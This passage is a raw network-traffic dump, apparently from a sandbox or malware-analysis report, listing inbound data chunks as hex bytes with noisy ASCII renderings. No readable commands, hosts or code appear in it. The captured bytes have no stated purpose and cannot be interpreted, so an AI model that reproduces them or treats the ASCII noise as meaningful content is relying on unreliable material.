4f 81 53 fe 64 5c f4 0e 8e 5b 5f 9a c3 58 d5 c4 f6 6b 4f 35 3c 29 18 17 bd d3 b0 40 6e c0 a3 5a e0 9d 3d f0 2d 27 a8 b7 57 2b d1 aa 25 7d bc Data Ascii: 9)jxHE)}W=W)_.P;n;'WEzhMHb>qlL/C\|y@Ta:?\-\EL><i+MONboZRd}h>_-=7q:)K/9RwWstOSd\[_XkO5<)@nZ=-'W+%}
2023-11-18 09:02:39 UTC	977	IN	Data Raw: b6 67 93 e6 4b f8 69 7b db 21 cd 17 83 2f 3b e4 70 a4 e0 32 b3 97 8d f0 c7 93 ed 0b 18 1d 8b 47 67 b3 3e 74 7f 61 b5 b3 58 e8 fd ad 96 a6 a7 69 e9 e8 41 d6 c7 4d e0 0f 2e f6 9a 3d e0 9a f0 5f 3b 8f fc d7 f6 e8 f5 c4 4d ea 62 ab 4e f8 4a c5 17 11 66 21 6a e8 f6 7e 49 87 33 db 86 8e fc 5d d5 25 28 87 67 df a9 56 cb 5a 96 fe 9e 03 97 cc 73 20 68 b1 ea 3c d8 43 44 35 41 2e 22 66 04 b8 87 f0 53 39 8c 30 de 64 ae e4 0c fd 8f c2 8f 7a f3 bf d4 82 19 d0 da 69 2d f8 9e 9a c4 d1 d7 5a 1c 7d ad e0 43 52 f5 04 fd 6e 34 ae c7 f5 dd 46 27 51 a1 f9 3c 36 d2 11 c8 0f cf f4 e6 b7 69 c1 c5 d0 c8 80 16 ac 83 46 22 90 49 45 8c 15 d8 54 bd d5 54 bd 68 8a 3b fd 80 0c 03 b3 8d f5 08 f0 1e fe bf 24 47 08 81 d9 28 64 fb fd 09 62 bf de 89 1b b2 f1 e1 34 2f 46 b2 79 b9 4f 2a e2 f1 Data Ascii: gKi{!/;p2Gg>taXiAM.=_;MbNJf!j~I3]%(gVZs h<CD5A."fS90dzi-Z}CRn4F'Q<6iF"IETTh;$G(db4/FyO*
2023-11-18 09:02:39 UTC	1106	IN	Data Raw: c4 eb 6f 2d f0 17 f9 48 17 56 92 07 59 83 b4 2e 94 1d 17 cc 28 dd 9e 6a 20 e6 4f 10 1c 56 c4 7e 91 c0 79 22 39 d4 e6 02 77 0f a4 e7 0e 2b 7b d5 8d f8 66 3c d2 8f 9e af 40 8f 77 6c ec 05 d6 ef 4e 4e ee 76 41 ae e2 ff c2 60 da 31 9e 77 bd 71 79 90 47 52 7f cf 01 29 5b 3e c9 7b 3f 00 5a 37 3c f8 ad b1 eb 47 b2 4b 11 b8 26 ad 84 06 6d 44 a0 a4 11 03 35 0e 5e f4 3f 49 79 10 25 a2 af e4 ab 1c 1c e5 e5 9b a3 5e 53 08 a8 6f 76 6e 0b 33 a7 01 f5 08 50 ed 51 5e 5b 46 c8 54 46 2e e5 93 4b ed f4 12 90 a2 49 20 25 70 24 0c 1e e6 75 e3 71 a2 0d be 30 ef 4a 9d 2b 4c a5 0c 61 ce df b2 33 fb 57 19 2e d3 ac b6 2f e1 e9 2b bf 62 3e be 11 2f c1 fd 3f 35 dd 6f bd 57 df 82 43 99 69 b4 8c 3f 7a c7 4d bc c1 77 b7 9c 4c 4b ad 6b 8d fa a2 20 30 fa 2c 98 ac c7 be 1e 3a 3f 90 ba 22 Data Ascii: o-HVY.(j OV~y"9w+{f<@wlNNvA`1wqyGR)[>{?Z7<GK&mD5^?Iy%^Sovn3PQ^[FTF.KI %p$uq0J+La3W./+b>/?5oWCi?zMwLKk 0,:?"
2023-11-18 09:02:39 UTC	1122	IN	Data Raw: 39 95 ce 0c b9 12 62 46 a0 7f fd 18 e8 f2 75 6e cd 13 19 d3 c3 5a 8e 7e 8c dc 68 0f 9e 2d 57 8f 73 af 80 4b f1 73 4a 9d 07 32 74 53 06 75 a2 85 cd 55 a7 93 e0 2a e1 82 0c 0d d2 23 14 36 2e 88 73 c0 1d 6a d8 50 a5 3e 50 b7 f8 ed 32 06 9d d5 2f 27 f0 64 1a 5d 5c 16 ca 5b c0 52 05 81 18 70 85 d7 b5 11 21 1d 23 d0 cd 35 70 76 35 98 27 2f f6 6a f4 b0 3a 42 1f cf 4d 5c f6 12 47 8d 42 de e3 7e c4 0b 45 45 64 b2 94 69 0c 19 40 e8 00 28 6d 2a 18 56 ab 2b 39 8a c6 b2 20 2a 0b 8a ab a6 54 02 46 a9 3f f3 99 ef 41 74 ad 2c af 02 fe d5 d7 ad e4 9e 2c 53 e0 5b 2d 29 c5 72 c5 05 50 91 d5 2a b8 83 20 18 48 11 df b9 82 dc 6a 2f 10 21 ff 31 be 48 41 21 da 8c 72 08 99 b9 c1 65 87 62 10 70 bf e2 0a 9f 8b 3c ad 1f 92 57 c9 f0 59 e5 08 97 4c ad 18 ac 22 8a a0 72 0f 3b 37 69 28 Data Ascii: 9bFunZ~h-WsKsJ2tSuU#6.sjP>P2/'d]\[Rp!#5pv5'/j:BM\GB~EEdi@(mV+9 TF?At,,S[-)rP Hj/!1HA!rebp<WYL"r;7i(
2023-11-18 09:02:39 UTC	1138	IN	Data Raw: ef 6b ac fa 0c ee 24 ad 93 d4 16 f8 20 09 53 de 12 50 77 a9 5b b5 05 bf 50 8a 7c 1f 85 84 d6 ae ce 09 7e e1 f4 6d f2 0f 86 1b 9a 0f 13 54 d2 e7 31 84 cf 7b f4 f1 14 fa f4 f6 aa 30 e7 6b b0 c9 15 b5 40 aa 27 fc c6 7a 9d 39 c9 c4 87 5e 0f 8b bc a0 8d 3e 39 12 3e 09 6a 22 cb 67 2f 81 cf de 64 f9 ec 19 76 c8 06 6d 80 a5 a8 c1 d7 a4 44 7a 5b e3 f9 6b 0b 0e 88 fe ce 1e e1 54 37 91 e0 ae 75 84 23 c9 7f b2 b6 80 33 69 d8 30 93 c6 5e 40 f0 91 82 d3 f1 5f 54 13 83 0b 6a e0 5c ba 58 c1 b0 d6 c3 cb c5 c0 09 c0 e7 5f 84 27 34 65 15 b5 af 86 00 cd 98 b2 0b 2a 8e 80 c4 0f e3 c0 12 6c a2 da 23 fa 3b 94 ff 0d a5 81 42 ee 86 75 30 c6 e8 1d 74 7f f1 6d 52 16 dd 06 78 bb 8f f5 1b 35 d4 65 e0 45 6d c1 16 fc 70 e0 ef da 82 ed f4 d7 93 34 5c 6d 39 66 15 39 18 50 d5 f7 83 1d 49 Data Ascii: k$ SPw[P\|~mT1{0k@'z9^>9>j"g/dvmDz[kT7u#3i0^@_Tj\X_'4e*l#;Bu0tmRx5eEmp4\m9f9PI
2023-11-18 09:02:39 UTC	1154	IN	Data Raw: bb 3f 98 ed 8e 26 7c 6f 66 c2 fc 2e e6 76 99 d0 ee 02 b3 dd 9c 84 76 2f 58 c6 19 fd 8b 59 2f 37 61 5c c3 8e 33 ae fa e5 a2 ff b7 5a 49 92 b2 23 a1 f3 54 eb e2 b4 b2 94 26 2d ad 7b cc 7e c6 92 e7 2b 7a 37 1b fc 2e 4a eb 1e 3c 89 60 f5 2d a7 6d f0 ec 3a 22 a3 3d 57 83 b5 0e 0f 2b d6 5d 6c ce 45 fa af 6b 44 9d 4f 0e 51 9d 5f 13 3e 94 6c 8b 87 a7 fc 50 d3 bf c4 7c f7 71 10 e7 09 ff 63 93 ca 46 7f 81 46 13 58 14 37 e3 37 56 c0 da a8 e2 5f 26 65 be e2 55 88 0f c6 5f dd f4 1b a4 bd f9 0d a8 51 2e c6 15 fd 03 2b 08 de 49 a8 0e 51 2b a2 15 bc 18 15 50 73 09 0b c2 ec c7 59 f3 44 18 ec fc a7 98 ce 87 bf 88 7b 6a d2 7a 38 6f 20 bf 31 d0 0c 6d e2 c4 f0 be c0 30 ad ce 2a 6b f7 7b b5 52 43 ce ee 2f 32 64 00 e0 9f dc 1b 4d 19 3d eb c9 fe 39 4b dd 6b e6 4b 94 37 c1 fd bd Data Ascii: ?&\|of.vv/XY/7a\3ZI#T&-{~+z7.J<`-m:"=W+]lEkDOQ_>lP\|qcFFX77V_&eU_Q.+IQ+PsYD{jz8o 1m0*k{RC/2dM=9KkK7
2023-11-18 09:02:39 UTC	1170	IN	Data Raw: db 72 e4 8e ff d6 ba e3 ab 68 c7 df c4 d3 7b f3 f8 3b 7e 14 57 f9 17 ef f8 35 39 bc e3 81 c9 c8 35 77 fc db dd ef 79 f0 21 ef 7e cf 8b 21 e8 f7 fe 64 ee 77 08 3b 0b 2b 50 89 a0 cf d7 37 5c fc 7f df ef df 5f cc fb bd ea c4 f6 fb ba 8b ff 9f f6 7b ae 47 cf 1c 64 ee f7 5c 7d 9a e8 c7 27 06 0e 68 f7 7f de ef 86 27 00 a4 ea cf 83 5d ac 6f ba 88 c6 65 83 0d 7f bb 11 87 8e 4e 11 5e 64 a0 10 f5 04 cc 3c 25 7c 32 6c fa ff 98 f9 ea f6 9c e0 3c 26 66 d2 be df 7f 11 e1 f3 b2 8b 10 9f 21 66 cd 89 ef 77 d1 8f 2b f3 04 f6 3b 30 ef 65 98 32 0e f7 fc d7 e7 13 f1 22 15 dd 2c db 71 2f 39 34 ef c4 fd de 71 61 dc 7e cf 93 7b fd 37 ef 47 90 3f 88 db 9d 14 bf e7 23 0b d2 58 0e a0 8f e1 1a cd c6 ae 07 f0 62 7c d2 ea 0b cd fd 5e 7e 69 fc 7e 27 7f 69 bf 27 07 00 f2 df 3e ed 31 52 Data Ascii: rh{;~W595wy!~!dw;+P7\_{Gd\}'h']oeN^d<%\|2l<&f!fw+;0e2",q/94qa~{7G?#Xb\|^~i~'i'>1R
2023-11-18 09:02:39 UTC	1186	IN	Data Raw: 85 49 5e 9a 4f 76 7b 9d 79 f8 98 a0 42 b6 7f c6 2f c4 27 87 43 db 7a a7 9f 0d 2b 9f 91 95 6f f3 bd f8 48 f5 72 3f 29 a4 49 90 6a df 31 d0 75 c7 69 f5 aa f4 f6 4a 47 cd 06 13 67 33 3c 27 12 79 7b 31 6e 38 9d 82 6c a6 c3 84 de 68 4d 67 47 48 a4 a2 c8 cc 0b a0 1d 1a ab 8d 96 5d cb ca ee 6d a5 0f 1d d3 a5 ee 77 8d ec 9a 3c 9c d4 ab 8c de 8f e8 80 4d 8e 9a 96 07 41 6f f3 59 bf 3f 60 03 33 48 23 e0 cc 1f 55 16 4a 85 1a cb c6 4c 62 75 c4 9f db f1 59 9c 63 03 f5 8d e9 e3 8d 8b 01 d5 5c 83 8b 00 e8 e6 bf 02 97 10 86 90 47 46 04 ac dd 57 a7 28 42 2b 6f 94 94 a6 45 18 1a 1c d4 3d ef a9 a9 13 90 2c 35 e0 c8 7d a7 df ef 0f 1f b9 bd 93 b1 43 e0 78 b9 5d 4b ac 11 7d 95 39 c5 9b 40 9e 2d dd 41 0b d4 e4 cd 3d 85 7b 48 75 e8 08 08 17 c8 e6 8c a7 2a d1 83 23 1e 93 f7 4f 17 Data Ascii: I^Ov{yB/'Cz+oHr?)Ij1uiJGg3<'y{1n8lhMgGH]mw<MAoY?`3H#UJLbuYc\GFW(B+oE=,5}Cx]K}9@-A={Hu*#O
2023-11-18 09:02:39 UTC	1202	IN	Data Raw: 87 35 58 2c 59 66 92 7c d9 4d 55 c3 11 b3 a0 e7 1a 53 5a 6d 75 bd 07 d8 bf 0c b4 b3 f9 18 2d 77 76 9d 53 1e 64 e7 33 09 b2 51 e5 cd 9d 60 80 4d 41 ae dc 36 fa f4 7c 72 de b5 dd 27 e7 dd 6d b7 2b 39 36 64 15 89 c7 17 45 90 cd bc c7 66 6c 0a 72 ad 7c 54 de cf a6 06 68 cc 32 9a 92 72 3f 9e 50 7f 55 c4 2a 1e 29 4e 9c 95 97 b0 d2 89 8c 73 ba dc cf d1 2d b5 64 f0 76 29 54 63 b4 36 16 66 a5 63 ed c4 fc 36 26 63 5e 1b 5a 98 42 66 f4 7a 46 86 f2 71 be 3a 9c 31 8f 32 4e 33 ce 4d 95 50 7a c9 fc 70 90 d6 66 c6 86 9d 7f bb 5d 21 3d de 25 a7 a0 6f 87 cb 89 69 55 32 c8 61 28 55 62 d4 fc d1 75 44 cf 23 e4 e9 c9 49 3d e1 dc e1 b2 7e aa 09 be 3e b9 ef f8 b5 2e 63 b2 a3 c3 aa 3a 39 13 16 f3 51 8b 23 4f 8d 9b 8a a9 de 9d d1 62 97 ab cd 87 8d 4e 0d e3 f8 b3 a2 85 ca 4c bb 74 Data Ascii: 5X,Yf\|MUSZmu-wvSd3Q`MA6\|r'm+96dEflr\|Th2r?PU*)Ns-dv)Tc6fc6&c^ZBfzFq:12N3MPzpf]!=%oiU2a(UbuD#I=~>.c:9Q#ObNLt
2023-11-18 09:02:39 UTC	1218	IN	Data Raw: e6 82 c5 60 05 58 07 b6 80 1d a0 13 f4 fc 1c f5 00 e4 83 0a 10 04 4d 60 31 58 03 da c0 76 b0 1f f4 ec 44 19 82 6c 90 0f 2a 40 04 34 81 15 60 0b d8 0e f6 81 6e 5f 20 5e 30 18 8c 05 11 d0 04 96 82 f5 60 2b e8 04 dd be c4 3e 82 01 60 38 f0 81 20 68 02 2d 60 1d d8 02 76 80 4e d0 e7 ab 0c 1a 08 f2 bf e2 ef 54 c5 fe 81 b9 60 31 58 03 36 83 6d 60 2f f8 0e 64 ee 47 dc 20 0f 14 82 0a 50 07 1a c1 7c b0 04 ac 06 eb c0 66 b0 0d ec 06 fb 41 b7 af 91 37 d0 1f 0c 06 85 c0 07 a6 83 3a d0 08 16 80 25 60 35 58 0f b6 80 0e b0 1f f4 f9 06 79 05 f9 a0 02 c4 c1 7c b0 04 ac 01 9b c1 76 b0 1f f4 fc 16 75 03 0c 06 63 41 1d 98 0b 9a c1 6a b0 01 b4 83 dd e0 3b d0 e7 3b 1c 0b 90 07 2a 40 1d 98 0b 16 83 d5 60 33 d8 0e f6 01 fa 2f ca 01 f4 07 79 c0 07 2a 41 23 58 0c d6 81 2d a0 03 74 Data Ascii: `XM`1XvDl@4`n_ ^0`+>`8 h-`vNT`1X6m`/dG P\|fA7:%`5Xy\|vucAj;;@`3/y*A#X-t
2023-11-18 09:02:39 UTC	1234	IN	Data Raw: 71 34 61 24 25 63 a2 a7 b9 76 f5 20 83 21 8c e4 64 ac af 11 ad b2 84 65 27 ac 88 96 39 c2 4a 23 ac a1 d6 79 42 4d 4f 6e 6d 69 6b f4 93 97 b3 e2 37 c7 c6 09 84 9c 91 dc ec a9 af 0e 21 8b 84 9c 49 fa ba cc 57 5d 8b 5f cd 88 5f 03 1a 27 25 e2 39 9e 99 1c 46 94 09 f1 92 e4 d6 aa da b6 aa 56 9f a7 d6 53 e7 01 b2 42 c8 b3 92 5b 71 bf f0 5b c3 db 5a ab 6b 3d 28 4e 25 f4 4b 93 9b c3 c5 35 42 ce 4a 6e 8e 10 d7 09 fd b2 e4 56 d2 37 98 80 36 e8 a0 41 88 b3 93 9b 43 89 26 21 ce 81 c5 c7 cb 17 6f bb 88 28 82 46 7e ff 24 0e fb e9 84 c1 95 27 0e 3b 76 0d 50 47 57 55 05 6d 91 bc be 28 de b6 01 a8 31 55 25 f9 45 0e 57 29 8a cf 99 fa 68 1c ae a1 17 7e 8f 7f 1e 7e 4d 20 6e 71 5c 55 45 6e 89 bb 2a 3b d7 5d 50 5c 84 92 e2 1d 89 29 f1 b0 58 15 b5 ad fe a2 f6 15 28 de 99 72 0d Data Ascii: q4a$%cv !de'9J#yBMOnmik7!IW]__'%9FVSB[q[Zk=(N%K5BJnV76AC&!o(F~$';vPGWUm(1U%EW)h~~M nq\UEn*;]P\)X(r
2023-11-18 09:02:39 UTC	1250	IN	Data Raw: 50 4a 10 02 f1 58 d0 49 10 02 f1 38 d0 49 11 02 f1 78 de 6b ec eb 5d 3c 37 7e 1e be 68 06 7f 7e 71 8a f7 fc 72 96 d1 85 ef ad 39 5b 3a 0d 23 ef bf 3d 1e df 57 6b da c3 ee e8 e7 fd 8f 7e ac 3f 7f 7a ff ca f3 18 7d 34 30 7b dd aa 81 cd 06 de c5 f3 8c 97 0f b1 b7 40 0e 87 ef bc c7 f7 d7 ba e7 d6 d8 7d 46 f0 39 b9 0d fe 27 12 f0 ee 5a 69 0f fb 43 31 79 ff 2f c5 f1 7b 17 f8 81 5a f3 73 ec 36 4a 9e bd d9 90 dd 12 5e bf 2e 48 1e e4 89 93 9f 39 dc 3f b8 c1 c0 0f f1 ef a9 7e 9d 4e 1d 1a 5c 63 e0 87 f9 7a b5 e7 17 b1 3f b8 e8 df bf c0 8f f0 b1 ce 84 3d 60 50 bc bf e6 b0 75 ce fb f8 8c ff 2e 20 fc 42 6d 7c 6f 8d ed 00 b6 fe c1 0a 1d a8 35 ad 63 2f 96 e7 7b d9 fb a3 36 c4 6b fa 22 0f 1a f3 f3 37 b1 8f 30 f3 f7 b4 19 f8 a5 5a cb 5f e5 d8 6d 54 36 8f 45 03 df eb 1f 59 Data Ascii: PJXI8Ixk]<7~h~qr9[:#=Wk~?z}40{@}F9'ZiC1y/{Zs6J^.H9?~N\cz?=`Pu. Bm\|o5c/{6k"70Z_mT6EY
2023-11-18 09:02:39 UTC	1266	IN	Data Raw: 03 fa 0d 6c b8 88 91 1b f1 4f fa 08 46 ee c3 11 a7 27 f0 1f df c5 7f 0c fc 06 fe 03 92 21 ca cc de 3e 96 a1 3f 94 32 54 51 64 68 eb 42 c5 30 10 f9 d5 1a 6d d2 07 47 0c d3 a8 1a d2 93 fe e0 3e a4 b4 a3 b6 9d dd 83 ce 09 52 ee 50 9e 18 6a 2b 77 6f 7b da 87 10 fc f8 3a 37 0f 1e 82 bd 74 ee 08 54 66 d4 b6 ad 7b 70 cc c8 9f 55 24 a8 32 a3 b6 ed dd 5b e7 a8 d7 04 f6 5f 6b 47 53 c7 e0 8c b9 72 c4 a8 1e 87 d6 8f 43 72 57 a8 fd 87 e9 c1 7a 1a bb c8 ae b5 e8 65 90 46 a0 47 3a 3e 18 2a b7 65 fc ff fb 52 b9 3d d8 85 9b 3d 9e 52 cc e4 c6 67 90 2f 1c f8 37 f2 10 18 1b 7b e7 74 33 d5 b6 a1 cb 88 fc e7 27 1f 84 1b a5 2a e3 1d 44 08 bc 03 9e 11 ef eb 96 63 49 b8 e5 c6 1b 48 b4 96 00 d9 34 70 23 ee 28 cd 96 00 b0 c1 f6 94 20 0b f3 59 e8 5c 9f 39 05 25 a7 47 3f 08 25 67 80 Data Ascii: lOF'!>?2TQdhB0mG>RPj+wo{:7tTf{pU$2[_kGSrCrWzeFG:>eR==Rg/7{t3'DcIH4p#( Y\9%G?%g
2023-11-18 09:02:39 UTC	1282	IN	Data Raw: 66 62 8d f3 71 d0 48 3a cb 40 82 5e ac c1 ea c0 17 37 e0 d8 6f 8c fe 13 06 7c b0 98 9d 36 e2 49 03 3e 96 d8 e6 2b c2 88 96 e3 ff fd 54 46 8c b1 ef 99 2f 65 66 39 32 2a 22 a1 69 5c b2 94 f6 8c e4 67 b5 37 e1 98 01 c7 c2 9e 1a 28 66 b4 c9 1d 8e 22 e3 86 11 38 3b 85 df 17 a6 ca e3 ec 84 15 1c cc ef 2c 33 ce b6 62 b0 b1 f8 2f 38 c2 a6 36 c9 78 88 ab 73 95 73 5a 9e a9 11 57 c9 a6 55 b4 fb 38 d3 2a da b4 82 76 f3 55 b6 b8 f6 4c cc ed 21 9e 9b 3a 85 f9 97 f6 7e f1 6c 5d 67 5a ed 69 73 14 cf b6 f5 e2 9c 77 21 9f c7 61 5c 7d 05 7a 9e 35 83 30 92 73 8c 8f f6 9e af 77 8b f3 48 98 20 a3 de c5 93 ed a9 94 aa af 69 cf 2f 44 4c 4f c5 ae 0d 62 44 d1 24 fe e9 8f 78 c6 ff 9b b9 fb 0f 8e a3 ba 0f 00 fe f6 7e f8 6e f5 fb 4e ba d3 6f db 18 83 81 52 b0 8d c1 40 0d 44 96 65 5b Data Ascii: fbqH:@^7o\|6I>+TF/ef92"i\g7(f"8;,3b/86xssZWU8vUL!:~l]gZisw!a\}z50swH i/DLObD$x~nNoR@De[
2023-11-18 09:02:39 UTC	1298	IN	Data Raw: 6f 92 be d5 8e 2e 3e eb 30 c2 05 a4 73 2d 07 57 0d 16 7c 4d 8e 4b ad 6c 32 1a b7 14 9a ff 17 69 aa d2 88 df 46 8e aa 54 da 6f 93 5e 95 bf 2e 76 7a 25 29 93 83 e9 dd 0e 1c 9f f4 13 73 b3 f1 4c 76 bb 0c 5f 27 d8 c9 97 6f b6 30 73 48 13 a7 6a b4 5b eb dc 2e d7 52 75 12 63 da f8 63 ab 6c 70 22 c5 4d c0 d4 64 f5 32 35 1a f1 3d d4 52 7c 6c 4e 18 52 bd 6e 07 78 a6 76 6e 49 dc c7 30 a5 45 3b ca 36 97 ab 09 35 55 fa 7d 82 9a 87 2d 00 95 d5 a0 cb 29 fb e4 89 69 d1 0b 62 3e 40 ca 32 cc 6a 06 ab ad ce a6 ec d7 b8 5a 60 d5 4f a4 a4 b0 3c 1c 75 9e 56 87 d7 d6 28 0f f0 fc bb 44 44 4a 4e 8b e1 2b c9 db 06 d6 06 dc 3a 59 6a 75 38 59 9b 4a 51 b3 36 34 b9 6a ad 4d cc 41 c7 57 7f 7b c0 54 20 2d 35 ac e8 60 22 6c 56 ea e5 72 8b 87 48 69 b1 98 22 04 a5 ab 79 58 a9 6b ad b6 25 Data Ascii: o.>0s-W\|MKl2iFTo^.vz%)sLv_'o0sHj[.Rucclp"Md25=R\|lNRnxvnI0E;65U}-)ib>@2jZ`O<uV(DDJN+:Yju8YJQ64jMAW{T -5`"lVrHi"yXk%
2023-11-18 09:02:39 UTC	1364	IN	Data Raw: 19 bc c1 d5 50 33 08 82 2e 6b fd ba ac 23 1a 0b 51 2b a9 f7 ab ce 27 98 9f 45 f3 64 95 3a 04 2f 94 3d 1c 2d 68 0f c8 ab 48 31 8c 00 5c 0d ef 22 41 3a 03 b5 a2 8b d4 89 2e 12 12 5d a4 9e ba 48 98 77 91 06 3a 37 8d 74 f0 4d d4 45 22 c4 45 9a c5 e9 8e 8a d3 dd 02 d3 1a f3 4f 6b 9c b8 48 a2 17 79 a6 cf f8 c9 6d e2 64 19 da a5 28 da a5 65 68 d7 46 d1 ae 9d 47 bb 8c 1c ed 3a 64 68 d7 c9 a3 5d 17 a0 5d b7 18 fb f6 88 7e dc cb c7 67 9c 07 f6 b1 23 07 e6 6d 5c 01 71 85 ed 7c 5c a5 13 c7 d9 41 82 ae 9d 21 05 c2 ab 5d 8c eb ec 66 5c aa 5f 1a 5e 0d 78 68 31 c8 a0 c5 90 17 f4 0d d3 b8 6d 8f af 73 1c 16 d3 90 6c 2f 1b 1f ef 03 4e af 17 28 ba 6f c4 01 81 fd 5e 4c 7d a0 5f f1 26 83 a0 cb 41 3e 54 3d c4 ce 81 1b f9 32 60 48 6a 1d e5 41 e8 18 cb c1 4d f2 71 dd 1f 6a 9c 90 Data Ascii: P3.k#Q+'Ed:/=-hH1\"A:.]Hw:7tME"EOkHymd(ehFG:dh]]~g#m\q\|\A!]f\_^xh1msl/N(o^L}_&A>T=2`HjAMqj
2023-11-18 09:02:39 UTC	1428	IN	Data Raw: 61 b8 25 f3 50 68 60 9c c0 e7 14 df 00 57 a6 13 b1 c4 27 17 9b 03 7d 99 6b d2 6b 3e 77 36 79 e3 68 5c 99 1f 99 eb dc 1d 99 dd 10 99 db 3e 02 59 1a c2 db 23 35 0d 11 94 af 35 30 f0 b1 c2 6e c7 e0 c0 75 45 7a c1 9d ea 40 68 9f 6e 2a 78 ae fe 85 fa 2f d6 3f 4f 4d 99 17 56 c7 ed c0 f3 75 e1 31 da bb 88 d2 5e 21 58 f8 a6 da 46 2b 88 57 f5 c0 ab 7a e0 15 cd ff d2 c8 f4 c5 91 9a 77 46 a6 53 7c 03 ff 12 c6 d5 8f 40 ab e9 06 d6 1e 82 d5 4b f1 e5 a6 ef a9 c8 f9 d7 47 aa 9a 22 e7 cf 8f 54 35 98 39 ad a7 06 cd 36 f9 ad a7 ce 26 ef 0a 8c 55 13 e5 21 94 0d 2d 0e 2f 8d 9c bf 28 52 b5 2d ab 64 3c ec 97 3b 48 e5 be 17 28 d7 49 39 16 3c 87 e5 d2 26 eb 6b 2d 07 2b 25 35 77 ff 31 a7 af 80 6a 3f 7d 36 79 91 95 79 3e fc f4 59 5e eb 55 e6 f9 04 3d d7 65 e1 cd 76 83 15 84 b7 26 Data Ascii: a%Ph`W'}kk>w6yh\>Y#550nuEz@hn*x/?OMVu1^!XF+WzwFS\|@KG"T596&U!-/(R-d<;H(I9<&k-+%5w1j?}6yy>Y^U=ev&
2023-11-18 09:02:39 UTC	1475	IN	Data Raw: c1 28 f5 c3 1b 6d b7 8a af 99 df 6a 53 3f a5 64 ff 63 56 99 8f 6f 8c f8 2a c4 f0 57 6b 0d 81 78 1b ef 01 be 44 82 37 f2 d4 0f ef 0d fe 58 7c 37 f2 bb 83 4e 40 cd 31 be b7 c5 57 cd aa 8e f1 fd 58 7c 37 8b 85 c5 7d ac 44 fd 19 fe 76 8a ef 06 56 7d ac 54 98 2b 95 c7 4a 3d b8 fa 0d 84 66 6e f1 0d 17 df df 0c 84 8d 79 86 b4 4b 54 ce 73 e2 fb 9d f8 f6 8a ef ca 61 82 f5 12 df ef c5 77 54 7c e7 9f 2d d2 2a be f6 12 41 2b be f8 70 e3 7f ba f0 7f 58 7c 8d fc fc e8 8a 12 a2 eb 15 df 30 41 57 3d dc 4f bf 80 1f db ec 18 4a f1 b6 8b 70 37 fe 1f 77 77 1e de 54 99 ef 01 3c 29 55 50 0a 06 28 7b 2d 07 65 13 a4 4d cb 22 20 42 58 05 37 a2 02 82 5b 4f a1 05 aa 14 42 5b 11 ae 8e 46 19 77 e7 4e 54 40 45 90 c8 b8 7b d5 c8 e2 28 17 67 a2 83 78 d1 8b c6 1d 19 97 b8 02 2a 63 44 c6 Data Ascii: (mjS?dcVoWkxD7X\|7N@1WX\|7}DvV}T+J=fnyKTsawT\|-A+pX\|0AW=OJp7wwT<)UP({-eM" BX7[OB[FwNT@E{(gx*cD
2023-11-18 09:02:39 UTC	1523	IN	Data Raw: 66 9a d3 ea 07 f5 9c 7e c3 34 a7 11 41 4e c7 8f e9 39 5d 30 cd 69 d4 c8 69 3c 99 9c b9 90 be f8 f4 c1 a4 6e 69 a7 ca 6f 5b e7 74 6f 8c 32 f8 49 cd 7b 9c d3 bf 89 ea 39 bd 30 69 76 d7 f1 c5 5b f4 9c 86 4c fb 61 43 b0 bf 7f ee 4e 3d 17 37 98 3e 59 5b 18 b2 7e b2 96 14 e4 ab 7e cc fa 0c 90 ee cd d7 80 a7 ae ef a8 f9 6a 08 f2 d5 f8 7f cc d7 3d af e8 f9 3a 63 9a af 9f df 6a 9d af 8e 20 5f 4f fe 8a 9e af 13 a6 f9 7a 41 90 af ac 20 5f 5b 82 7c 7d ed fa 83 77 9b bf 74 29 75 f1 dc 85 f4 59 3d 6d c7 9f 55 af a4 04 f9 6a 19 f9 7a 10 7b f7 7b 9d af af bd a5 e7 eb 1a 75 0a ae 1c 98 af fb 6f d3 f3 f5 3f 8a 59 cf 7c f5 76 bd 67 de a0 98 e5 d4 39 64 9d d3 af 7c 58 cf e9 5b 8a 59 4e 5f 32 72 ca 27 86 ca 7e 4e 17 04 39 75 5e a1 e7 74 dc 34 a7 2b 7d 39 4d 9d 7d ea e2 f9 33 Data Ascii: f~4AN9]0ii<nio[to2I{90iv[LaCN=7>Y[~~j=:cj _OzA _[\|}wt)uY=mUjz{{uo?Y\|vg9d\|X[YN_2r'~N9u^t4+}9M}3
2023-11-18 09:02:39 UTC	1577	IN	Data Raw: 43 0e a6 bc bd 3d e0 06 23 02 b1 60 93 8f bb 39 e0 50 9b a3 83 e5 26 e5 aa 6f e6 f7 50 b4 2d 88 58 bc 5b eb 1a 27 62 2d 74 9e 31 0a 73 ee b7 04 28 68 cf d8 ec 41 ff c4 ec 5d de e0 1b 2b ed 8d b4 f7 0c 13 69 cf c4 49 36 e1 ac cc 96 cb fd 09 b2 4b 09 ee e5 43 6c 33 25 41 83 94 5d 68 19 6d 8e d1 7b e4 f7 7d 48 47 48 94 cf e9 f7 f7 8d 9a 22 73 6c 1b 92 e5 e6 d2 1c 92 4f 25 25 22 76 6c d6 ee 09 0c 93 d8 8a 85 5c 05 10 eb 37 bb 88 87 92 6e b9 1e 90 a8 9b f1 20 8f 87 6a 41 80 a2 21 96 a1 0b be c1 27 d0 6a a2 a3 a9 48 d3 6c f2 30 53 34 30 ba 50 5e 90 9e 81 6d bf b8 bb 03 d2 ae 0a d8 1d b0 6f 48 21 d1 ad 02 3f 15 1d 47 fb 9d 98 d4 e1 34 3b 14 20 00 d7 49 09 b8 99 03 f9 81 21 cf 61 06 5f 26 c4 75 d9 45 db ee 69 37 e0 45 86 b4 43 b3 04 99 4d 0d 0e a0 be 04 a7 08 ba Data Ascii: C=#`9P&oP-X['b-t1s(hA]+iI6KCl3%A]hm{}HGH"slO%%"vl\7n jA!'jHl0S40P^moH!?G4; I!a_&uEi7ECM
2023-11-18 09:02:39 UTC	1620	IN	Data Raw: 7d 66 ef 1b 7b df d9 eb 1d ed 19 3d 6f 74 df e8 fc e8 67 47 bf 34 fa d5 d1 af 8f de 38 7a cf e8 9b a3 f8 d6 22 1e 52 5c 81 9e 40 7f 60 6b 60 1c 6c 4e 04 96 02 85 c0 67 02 37 06 6e 09 dc 17 78 22 f0 46 60 dd c0 85 03 33 03 05 b0 fb 33 03 7f 3f 70 cd c0 77 06 1e 1d 78 72 e0 59 b0 fd 9d 81 ee e0 e6 e0 40 d0 08 96 82 47 83 9f 84 5e 5c 15 bc 2d f8 54 f0 f9 e0 2b c1 8e c1 8d 83 c1 c1 d9 c1 f9 c1 bf 1d fc 87 c1 6b 06 bf 33 78 c7 e0 fd 83 6f 0e fe 6a f0 0f 83 ef 0d 3e be f3 d9 9d 6f ed fc c5 ce df ee fc e3 ce a9 21 7d 28 3b 74 74 